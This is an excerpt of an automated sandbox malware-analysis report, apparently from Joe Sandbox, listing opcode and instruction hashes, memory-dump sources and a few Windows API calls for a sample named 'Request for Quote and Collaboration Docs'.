                                                                                          • Opcode ID: dbf49f991788034f370e920dcba501e4330ff51036cd420191f0f07a343804da
                                                                                          • Instruction ID: 721b40ce1ca1e7b6eab35129ffa8e72349fa6b4e43280734a86071bfa7095cf9
                                                                                          • Opcode Fuzzy Hash: dbf49f991788034f370e920dcba501e4330ff51036cd420191f0f07a343804da
                                                                                          • Instruction Fuzzy Hash: AE419D74A05349DFCB0AEFF4C4517AEBBB2EF86301F1044A9D411AB256DB345E49CB91
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ;$F$F$F
                                                                                          • API String ID: 0-2235280044
                                                                                          • Opcode ID: 09f47653cd189f8bc7457e3d5d2497de83b453aad93186d6c3f097d6ba2d094b
                                                                                          • Instruction ID: e98ab6aaad5c74e59ca8837b5d807b0cf9fdce06a46a796e2cbf09b1b9b7bda1
                                                                                          • Opcode Fuzzy Hash: 09f47653cd189f8bc7457e3d5d2497de83b453aad93186d6c3f097d6ba2d094b
                                                                                          • Instruction Fuzzy Hash: F921B074A04208DFCB0ADFF5C41169E7BB2EF87305F1084A9D814AB356CB745A49CF91
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: F$F$F$[
                                                                                          • API String ID: 0-77378503
                                                                                          • Opcode ID: 9444a04d48d2cfc56559e6a5967559ca5a02b70ac5680c20adde79343b68f519
                                                                                          • Instruction ID: a24d10a6fdab0b0ccf0bcc3929bc04d86aa0eb1fefb2b1dca30c1670829c45ae
                                                                                          • Opcode Fuzzy Hash: 9444a04d48d2cfc56559e6a5967559ca5a02b70ac5680c20adde79343b68f519
                                                                                          • Instruction Fuzzy Hash: 5C219D38A04208DFDB05EFF9C4113AEBBB2EF87305F1084A9D455AB296DB745A49CF51
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: F$F$F$K
                                                                                          • API String ID: 0-1418060888
                                                                                          • Opcode ID: 539dc59ec28e5a85e09a4e6312b0aaa271d4e15b78df59356dee0d278003d98a
                                                                                          • Instruction ID: d97c5b8bd7274d4c56461f1a4e49d01d2b7234d96f907c46f58d4e20d7097af6
                                                                                          • Opcode Fuzzy Hash: 539dc59ec28e5a85e09a4e6312b0aaa271d4e15b78df59356dee0d278003d98a
                                                                                          • Instruction Fuzzy Hash: 7321B074A04208DFCB06DFF5C41169EBBB2EF8B305F0084A9D414AB396DB345A05CF51
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: +$F$F$F
                                                                                          • API String ID: 0-751624429
                                                                                          • Opcode ID: 0e5ef5790200dae3faf7f0ac1dc206e88caeec1ffb1e50a8e0e6519c5153d6c0
                                                                                          • Instruction ID: 9e5d56aa7df8a8f41ad7646dcf060d1f49c9b11fc3dbb0bd7f5f8b13413e998a
                                                                                          • Opcode Fuzzy Hash: 0e5ef5790200dae3faf7f0ac1dc206e88caeec1ffb1e50a8e0e6519c5153d6c0
                                                                                          • Instruction Fuzzy Hash: CA21BD38A04208DFDB05EFF9C4112AEB7B2EF8B304F1084A9D815AB396CB345A46CF51
                                                                                          APIs
                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405ACB
                                                                                          • lstrcmpiA.KERNEL32(00405CF5,00000000), ref: 00405AE3
                                                                                          • CharNextA.USER32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF4
                                                                                          • lstrlenA.KERNEL32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                          • String ID:
                                                                                          • API String ID: 190613189-0
                                                                                          • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                          • Instruction ID: dad0a046b028959ebe33103b56e1cab2fddac0818810981e259aca52f0e6fc56
                                                                                          • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                          • Instruction Fuzzy Hash: 59F06232608558BFC712DFA5DD40D9FBBA8DF06260B2540B6F801F7251D674FE019BA9